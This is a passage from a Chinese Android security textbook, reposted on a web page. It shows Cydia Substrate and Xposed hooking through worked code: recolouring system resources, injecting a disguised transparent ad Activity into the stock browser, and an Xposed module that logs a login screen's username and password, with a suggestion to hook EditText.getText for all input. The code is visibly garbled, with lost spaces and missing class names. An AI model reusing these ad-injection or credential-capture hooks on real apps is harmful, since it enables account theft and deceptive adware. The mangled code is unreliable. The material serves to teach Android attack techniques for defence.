《Android安全技术揭秘与防范》—第8章8.3节HookAndroid应用

简介:

本节书摘来自异步社区《Android安全技术揭秘与防范》一书中的第8章8.3节HookAndroid应用,作者周圣韬,更多章节内容可以访问云栖社区“异步社区”公众号查看。

8.3 HookAndroid应用
前面我们介绍过Cydiasubstrate框架提供在Java层Hook的能力,其中主要是提供了三个比较重要的方法,MS.hookClassLoad、MS.hookMethod、MS.moveUnderClassLoader。三个方法的具体介绍如表8-2所示。


c458af5030c93a8020cdc38a31fabcd248ad3c24

几个方法的具体参数与返回值,我们可以看如下的方法具体定义。

* Hook一个指定的Class
 * 
 * @paramname Class的包名+类名,如android.content.res.Resources
 * @paramhook 成功Hook一个Class后的回调
 */
voidhookClassLoad(String name, MS.ClassLoadHook hook);
/**
 * Hook一个指定的方法,并替换方法中的代码
 * 
 * @param_class Hook的calss
 * @parammember Hook class的方法参数
 * @paramhook 成功Hook方法后的回调
 * @paramold Hook前方法,类似C中的方法指针
 */
voidhookMethod(Class _class, Member member, MS.MethodHook hook, MS.MethodPointer old);
/**
 * Hook一个指定的方法,并替换方法中的代码
 * 
 * @param_class Hook的calss
 * @parammember Hook class的方法参数
 * @paramalteration
 */
voidhookMethod(Class _class, Member member, MS.MethodAlteration alteration);
/**
 * 使用一个ClassLoader重载一个对象
 * 
 * @paramloader 使用的ClassLoader
 * @paramobject 待重载的对象
 * @return重载后的对象
 */
<T>TmoveUnderClassLoader(ClassLoader loader, T object);

8.3.1 尝试Hook系统API
说了这么多我们下面实战一下,如我们希望Hook Android系统中的Resources类,并将系统中的颜色都改为紫罗兰色。思路很简单,我们只需要拿到系统中Resources类的getColor方法,将其返回值做修改即可。

使用substrate来实现分为以下几步。

1.在AndroidManifest.xml文件中配置主入口

需要在AndroidManifest.xml中声明cydia.permission.SUBSTRATE权限,声明substrate的主入口。具体代码如下所示。

<!-- 加入substrate权限 -->
<uses-permission android:name="cydia.permission.SUBSTRATE" />
<application
    android:allowBackup="true"
    android:icon="@drawable/ic_launcher"
    android:label="@string/app_name"
    android:theme="@style/AppTheme" >
<!-- 声明substrate的注入口味Main类 -->
<meta-data
       android:name="com.saurik.substrate.main"
       android:value=".Main" />
</application>
2.新创建主入口Main.Java类

上一步中已经声明了主入口为Main类,所以我们需要在对应的目录下新建一个Main类,且需要实现其initialize方法。具体实现如下:

publicclass {
   /**
    * substrate 初始化后的入口
    */
staticvoidinitialize() {
  }
}
3.Hook系统的Resources,Hook其getColor方法,修改为紫罗兰

使用MS.hookClassLoad方法Hook系统的Resources类,并使用MS.hookMethod方法hook其getColor方法,替换其方法。具体实现如下所示。

importJava.lang.reflect.Method;
importcom.saurik.substrate.MS;
publicclass {
   /**
    * substrate 初始化后的入口
    */
staticvoidinitialize() {
    // hook 系统的 Resources类
    MS.hookClassLoad("android.content.res.Resources", newMS.ClassLoadHook() {
      // 成功hook resources类
publicvoidclassLoaded(Class<?> resources) {
        // 获取 Resources类中的 getColor方法
        Method getColor;
try{
          getColor = resources.getMethod("getColor", Integer.TYPE);
        } catch(NoSuchMethodException e) {
          getColor = null;
        }
if(getColor != null) {
          // Hook前的原方法
finalMS.MethodPointer old = newMS.MethodPointer();
          // hook Resources类中的getColor方法
          MS.hookMethod(resources, getColor, newMS.MethodHook() {
publicObject invoked(Object resources, Object...args) throwsThrowable {
intcolor = (Integer) old.invoke(resources, args);
              // 将所有绿色修改成了紫罗兰色
returncolor & ~0x0000ff00 | 0x00ff0000;
            }
          }, old);
        }
      }
    });
  }
}

4.安装、重启、验证

因为我们的应用是没有Activity,只存在substrate的,所以安装后substrate就会自动地执行了。重启后,我们打开浏览器引用,发现颜色已经改变了,如图8-11所示。

阅读了本例之后,读者们是不是发现使用了CydiaSubstrate框架后我们Hook系统中的一些Java API并不是什么难事?上面的例子我们只是简单地修改了Resources中的getColor方法,并没有涉及到系统与应用的安全。但是,如果开发者直接Hook系统安全方面比较敏感的方法,如TelephonyManager 类中getDeviceId方法、短信相关的方法或一些关键的系统服务中的方法,那么后果是不堪想象的。


88b58ecb9babe0e87590d6c818b2796903b0224e

8.3.2 Hook指定应用注入广告
从上面的例子我们可以看出来,使用Cydiasubstrate框架我们能够任意地Hook系统中的Java API,当然其中也用到了很多的反射机制,那么除了系统中给开发者提供的API以外,我们能否也Hook应用程序中的一些方法呢?答案是肯定的。下面我们就以一个实际的例子讲解一下如何Hook一个应用程序。

下面我们针对Android操作系统的浏览器应用,Hook其首页Activity的onCreate方法(其他方法不一定存在,但是onCreate方法一定会有),并在其中注入我们的广告。根据上面对Cydiasubstrate的介绍,我们有了一个简单的思路。

首先,我们根据某广告平台的规定,在我们的AndroidManifest.xml文件中填入一些广告相关的ID,并且在AndroidManifest.xml文件中填写一些使用Cydiasubstrate相关的配置与权限。当然,我们还会声明一个广告的Activity,并设置此Activity为背景透明的Activity,为什么设置为透明背景的Activity,原理如图8-12所示。


c78e34f95e8ca0b6b0b67bccb7b5d186d22d41f0

其AndroidManifest.xml文件的部分内容如下所示。

<!-- 广告相关的权限 -->
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission
android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.GET_TASKS" />
<!-- 加入substrate权限 -->
<uses-permission android:name="cydia.permission.SUBSTRATE" />

<application
  android:allowBackup="true"
  android:icon="@drawable/ic_launcher"
  android:label="@string/app_name"
  android:theme="@style/AppTheme" >

<!-- 广告相关参数 -->
<meta-data
    android:name="App_ID"
    android:value="c62bd976138fa4f2ec853bb408bb38af" />
<meta-data
    android:name="App_PID"
    android:value="DEFAULT" />
<!-- 声明substrate的注入口为Main类 -->
<meta-data
    android:name="com.saurik.substrate.main"
    android:value="com.example.hookad.Main" />

<!-- 透明无动画的广告Activity -->
<activity
    android:name="com.example.hookad.MainActivity"
    android:theme="@android:style/Theme.Translucent.NoTitleBar" >
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<!-- 广告的action -->
<action android:name="com.example.hook.AD" />
</intent-filter>
</activity>
</application>

对于Cydiasubstrate的主入口Main类,依照之前的步骤新建一个包含有initialize方法的Main类。这个时候我们希望使用MS.hookClassLoad方式找到浏览器主页的Activity名称,这里我们在adb shell下使用dumpsys activity命令找到浏览器主页的Activity名称为com.android.browser.BrowserActivity,如图8-13所示。


3587734ec69bdd823bcbe636243df1adda33846f

使用MS.hookClassLoad方法获取了BrowserActivity之后再hook其onCreate方法,在其中启动一个含有广告的Activity。Main类的代码如下所示。

publicclass {

  /**
   * substrate 初始化后的入口
   */
staticvoidinitialize() {

    //Hook 浏览器的主Activity,BrowserActivity
    MS.hookClassLoad("com.android.browser.BrowserActivity", newMS. ClassLoadHook() {
publicvoidclassLoaded(Class<?> resources) {

        Log.e("test", "com.android.browser.BrowserActivity");
        // 获取BrowserActivity的onCreate方法
        Method onCreate;
try{
          onCreate = resources.getMethod("onCreate", Bundle.class);
        } catch(NoSuchMethodException e) {
          onCreate = null;
        }

if(onCreate != null) {
finalMS.MethodPointer old = newMS.MethodPointer();
          // hook onCreate方法
          MS.hookMethod(resources, onCreate, newMS.MethodHook() {
publicObject invoked(Object object, Object...args) throwsThrowable {
              Log.e("test", "show ad");
// 执行Hook前的onCreate方法,保证浏览器正常启动
              Object result = old.invoke(object, args);
// 没有Context
              //执行一个shell启动我们的广告Activity
              CMD.run("am start -a com.example.hook.AD");

returnresult;
            }
          }, old);
        }
      }
    });
  }
}

对于启动的广告MainActivity,在其中会弹出一个插屏广告,当然也可以是其他形式的广告或者浮层,内容比较简单这里不做演示了。对整个项目进行编译,运行。这个时候我们重新启动Android自带的浏览器的时候发现,浏览器会弹出一个广告弹框,如图8-14所示。

从上面的图片我们可以看出来了,之前我们设置插屏广告MainActivity为无标题透明(Theme.Translucent.NoTitleBar)就是为了使弹出来的广告与浏览器融为一体,让用户感觉是浏览器弹出的广告。这也是恶意广告程序为了防止自身被卸载掉的一些通用隐藏手段。

这里演示的注入广告是通过Hook指定的Activity中的onCreate方法来启动一个广告Activity的。当然,这里我们演示的Activity只是简单地弹出了一个广告。如果启动的Activity带有恶意性,如将Activity做成与原Activity一模一样的钓鱼Activity,那么对于移动设备用户来说是极具欺骗性的。


d1d1138512552f275534566f66a5e741a7460af4

8.3.3 App登录劫持
看了上面的两个Hook例子,很多读者应该都能够了解了Hook所带来的巨大危害性,特别是针对一些有目的性的Hook。例如我们常见的登录劫持,就是使用到了Hook技术来完成的。那么这个登录劫持是如何完成的呢?下面我们就具体来看看,一个我们在开发中常见到的登录例子。首先我们看看一个常见的登录界面是什么样子的,图8-15所示是一个常见的登录页面。


3441b6aaea94eb04f31a488042f260251d422de0

其对应的登录流程代码如下所示。
// 登录按钮的onClick事件
mLoginButton.setOnClickListener(newOnClickListener() {

  @Override
  publicvoidonClick(View v) {
  // 获取用户名
    String username = mUserEditText.getText() + "";
//获取密码
    String password = mPasswordEditText.getText() + "";

if(isCorrectInfo(username, password)) {
      Toast.makeText(MainActivity.this, "登录成功!", Toast.LENGTH_LONG).show();
    } else{
      Toast.makeText(MainActivity.this, "登录失败!", Toast.LENGTH_LONG).show();
    }
  }
});

我们会发现,登录界面上面的用户信息都存储在EditText控件上,然后通过用户手动点击“登录”按钮才会将上面的信息发送至服务器端去验证账号与密码是否正确。这样就很简单了,黑客们只需要找到开发者在使用EditText控件的getText方法后进行网络验证的方法,Hook该方法,就能劫持到用户的账户与密码了。具体流程如图8-16所示。


4b2e9a18ef2688680471ecbf03306d67cd4e7bf2

TIPS
 当然,我们也可以仿照上一个例子,做一个一模一样的Activity,再劫持原Activity优先弹出来,达到欺骗用户获取密码的目的。
明白了原理下面我们就实际地操作一次,这里我们选择使用Xposed框架来操作。使用Xposed进行Hook操作主要就是使用到了Xposed中的两个比较重要的方法,handleLoadPackage获取包加载时的回调并拿到其对应的classLoader,findAndHookMethod对指定类的方法进行Hook。它们的详细定义如下所示。

/**
  * 包加载时的回调
   */
  publicvoidhandleLoadPackage(finalLoadPackageParam lpparam)

  /**
   * Xposed提供的Hook方法
   * 
   * @paramclassName 待Hook的Class
   * @paramclassLoader classLoader
   * @parammethodName 待Hook的Method
   * @paramparameterTypesAndCallback hook回调
   * @return
   */
Unhook findAndHookMethod(String className, ClassLoader classLoader, String methodName, Object... parameterTypesAndCallback) 
当然,我们使用Xposed进行Hook也分为如下几个步骤。

1.在AndroidManifest.xml文件中配置插件名称与Api版本号

<application
    android:allowBackup="true"
    android:icon="@drawable/ic_launcher"
    android:label="@string/app_name"
    android:theme="@style/AppTheme" >

<meta-data
      android:name="xposedmodule"
      android:value="true" />
<!-- 模块描述 -->
<meta-data
      android:name="xposeddescription"
      android:value="一个登录劫持的样例" />
<!-- 最低版本号 -->
<meta-data
      android:name="xposedminversion"
      android:value="30" />
</application>

2.新创建一个入口类继承并实现IXposedHookLoadPackage接口

如下操作,我们新建了一个com.example.loginhook.Main的类,并实现IXposedHookLoadPackage接口中的handleLoadPackage方法,将非com.example.login包名的应用过滤掉,即我们只操作包名为com.example.login的应用,如下所示。

publicclass implementsIXposedHookLoadPackage {

  /**
   * 包加载时的回调
   */
publicvoidhandleLoadPackage(finalLoadPackageParam lpparam) throwsThrowable {
    // 将包名不是 com.example.login 的应用剔除掉
if(!lpparam.packageName.equals("com.example.login"))
return;
    XposedBridge.log("Loaded app: " + lpparam.packageName);
  }
}

3.声明主入口路径

需要在assets文件夹中新建一个xposed_init文件,并在其中声明主入口类。如这里我们的主入口类为com.example.loginhook.Main,查看其内容截图如图8-17所示。
screenshot

4.使用findAndHookMethod方法Hook劫持登录信息

这是最重要的一步,我们之前所分析的都需要到这一步进行操作。如我们之前所分析的登录程序,我们需要劫持就是需要Hook其com.example.login.MainActivity中的isCorrectInfo方法。我们使用Xposed提供的findAndHookMethod直接进行MethodHook操作(与Cydia很类似)。在其Hook回调中使用XposedBridge.log方法,将登录的账号密码信息打印至Xposed的日志中。具体操作如下所示。

importstaticde.robv.android.xposed.XposedHelpers.findAndHookMethod;
publicclass implementsIXposedHookLoadPackage {

  /**
   * 包加载时的回调
   */
publicvoidhandleLoadPackage(finalLoadPackageParam lpparam) throwsThrowable {

    // 将包名不是 com.example.login 的应用剔除掉
if(!lpparam.packageName.equals("com.example.login"))
return;
    XposedBridge.log("Loaded app: " + lpparam.packageName);

    // Hook MainActivity中的isCorrectInfo(String,String)方法
findAndHookMethod("com.example.login.MainActivity", lpparam.classLoader, "isCorrectInfo", String.class,
        String.class, newXC_MethodHook() {

          @Override
protectedvoidbeforeHookedMethod(MethodHookParam param) throwsThrowable {
            XposedBridge.log("开始劫持了~");
            XposedBridge.log("参数1 = " + param.args[0]);
            XposedBridge.log("参数2 = " + param.args[1]);
          }

          @Override
protectedvoidafterHookedMethod(MethodHookParam param) throwsThrowable {
            XposedBridge.log("劫持结束了~");
            XposedBridge.log("参数1 = " + param.args[0]);
            XposedBridge.log("参数2 = " + param.args[1]);
          }
        });
  }
}

5.在XposedInstaller中启动我们自定义的模块

编译后安装在Android设备上的模块应用程序不会立即生效,我们需要在XpasedInstaller模块选项中勾选待启用的模块才能让其正常地生效,如图8-18所示。

6.重启验证

重启Android设备,进入XposedInstaller查看日志模块,因为我们之前使用的是XposedBridge.log方法打印log,所以log都会显示在此处。如图8-19所示,我们发现我们需要劫持的账号密码都显示在此处。


e5c87bc2fd7bdf8517357e2ed258a2a0ad5a463d

TIPS
 这里我们是通过逆向分析该登录页面的登录判断调用函数来完成Hook与劫持工作的。有些读者应该想出来了,我们能不能直接对系统中提供给我们的控件EditText(输入框控件)中的getText()方法进行Hook呢?这样我们就能够对系统中所有的输入进行监控劫持了。这里留给大家一个思考,感兴趣的读者可以尝试一下。
相关文章
|
2天前
|
移动开发 API Android开发
构建高效Android应用:Kotlin协程的实践指南
【5月更文挑战第11天】 在移动开发领域,性能优化和资源管理是至关重要的。特别地,对于Android开发者来说,合理利用Kotlin协程可以极大地改善应用的响应性和稳定性。本文将深入探讨Kotlin协程在Android中的实际应用,包括它们如何简化异步编程模型、提高UI线程的响应性,以及减少内存消耗。我们将通过具体案例分析,了解如何在实际项目中有效地使用协程,从而帮助开发者构建更加高效的Android应用程序。
|
2天前
|
Android开发
Android应用实例(一)之---有道辞典VZ.0
Android应用实例(一)之---有道辞典VZ.0
11 2
|
16小时前
|
移动开发 API Android开发
构建高效Android应用:探究Kotlin协程的优势与实践
【5月更文挑战第17天】在移动开发领域,性能优化和流畅的用户体验一直是开发者追求的目标。针对Android平台,Kotlin语言凭借其简洁性和功能丰富性成为了许多开发者的首选。其中,Kotlin协程作为异步编程的强大工具,为处理并发任务提供了轻量级的解决方案。本文深入探讨了Kotlin协程的核心优势,并通过实例分析其在Android开发中的应用,旨在帮助开发者提升应用的性能和响应能力。
|
19小时前
|
数据库 Android开发 开发者
打造高效Android应用:Kotlin协程的全面应用
【5月更文挑战第17天】随着移动开发技术的不断进步,开发者寻求更高效的编程模式来提升应用性能和用户体验。本文深入探讨了Kotlin协程在Android开发中的应用,揭示了如何利用这一现代并发解决方案来简化异步编程,提升应用响应速度,并确保用户界面的流畅性。通过实例分析,我们将展示Kotlin协程如何与Android框架无缝集成,以及它们在处理网络请求、数据库操作和耗时任务时的优势。
8 1
|
20小时前
|
移动开发 Android开发 开发者
构建高效Android应用:探究Kotlin协程的优势与实践
【5月更文挑战第17天】 在移动开发领域,尤其是针对Android平台,性能优化和流畅的用户体验始终是开发者追求的目标。近年来,Kotlin语言因其简洁性和功能性而成为Android开发的热门选择。其中,Kotlin协程作为一种轻量级的线程管理方案,为编写异步代码提供了强大支持,使得处理并发任务更加高效和容易。本文将深入探讨Kotlin协程的核心优势,并通过具体实例展示如何在Android应用中有效利用协程来提升性能和用户体验。
|
22小时前
|
移动开发 Android开发 UED
构建高效Android应用:探究Kotlin协程的优势与实践
【5月更文挑战第17天】 在移动开发领域,性能优化和流畅的用户体验始终是核心追求。针对Android平台,Kotlin协程作为一种新兴的轻量级线程管理方案,正逐渐改变开发者对于异步编程和后台任务处理的认识。本文通过深入分析Kotlin协程的原理、优势以及在实际Android应用中的使用案例,揭示了如何利用协程提高应用性能,减少资源消耗,并最终实现更流畅的用户体验。我们将通过一系列实验证据,展示协程如何在不牺牲可读性和可维护性的前提下,提升代码执行效率,并为Android开发社区提供一种新的并发处理范式。
|
22小时前
|
移动开发 调度 Android开发
构建高效Android应用:Kotlin协程的全面应用
【5月更文挑战第17天】随着移动开发技术的不断进步,开发者寻求更高效、响应更快的应用程序。在Android平台上,Kotlin作为一种现代编程语言,提供了协程这一强大的并发处理工具。本文深入探讨了如何在Android应用中使用Kotlin协程来提升性能和用户体验,同时保证代码的简洁性和可维护性。我们将分析协程的核心概念,并通过实例展示其在实际开发中的应用。
|
1天前
|
移动开发 安全 Android开发
构建高效Android应用:Kotlin与协程的完美结合
【5月更文挑战第17天】 在移动开发领域,性能优化和流畅的用户体验是关键。对于Android平台而言,Kotlin语言凭借其简洁性和功能安全性成为开发的首选。与此同时,协程作为一种新的并发处理方式,在简化异步编程方面展现出巨大潜力。本文将深入探讨如何通过Kotlin语言以及协程技术,提升Android应用的性能和响应能力,并确保用户界面的流畅性。
|
1天前
|
安全 Java Android开发
构建高效Android应用:探究Kotlin与Java的性能差异
【5月更文挑战第16天】 在移动开发领域,性能一直是开发者关注的焦点。随着Kotlin语言的普及,其与Java在Android应用中的性能表现成为热门话题。本文将深入分析Kotlin和Java在Android平台上的性能差异,并通过实际测试数据来揭示二者在编译速度、应用启动时间以及运行效率方面的表现。我们的目标是为开发者提供一个参考依据,以便在选择合适的编程语言时做出更加明智的决策。
|
2天前
|
缓存 移动开发 Android开发
Android 应用性能优化实践
【5月更文挑战第15天】 在移动开发领域,应用的性能直接关系到用户体验和产品的市场表现。特别是对于安卓平台,设备的多样性和应用生态环境的复杂性使得性能优化成为开发者的一项重要技能。本文将深入探讨针对安卓应用的性能瓶颈识别、分析方法以及具体的优化策略,旨在为开发者提供一套实用的性能提升解决方案。